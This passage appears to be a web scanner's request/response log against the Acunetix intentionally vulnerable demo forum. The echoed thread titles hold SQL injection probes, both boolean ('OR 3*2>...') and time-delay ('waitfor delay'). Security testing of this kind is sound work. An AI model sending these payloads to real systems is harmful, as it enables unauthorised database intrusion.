Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 2+781-781-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 2+781-781-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 2+781-781-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=44 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3+781-781-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3+781-781-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3+781-781-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=45 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3*2<(0+5+781-781) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3*2<(0+5+781-781) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3*2<(0+5+781-781) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=46 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3*2>(0+5+781-781) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3*2>(0+5+781-781) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3*2>(0+5+781-781) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=47 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1 waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=48 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4228 |
Response Body - size: 4,228 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum UGrs47CJ'; waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/UGrs47CJ'; waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>UGrs47CJ'; waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=49 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4231 |
Response Body - size: 4,231 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum KHr20UMM'); waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/KHr20UMM'); waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>KHr20UMM'); waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
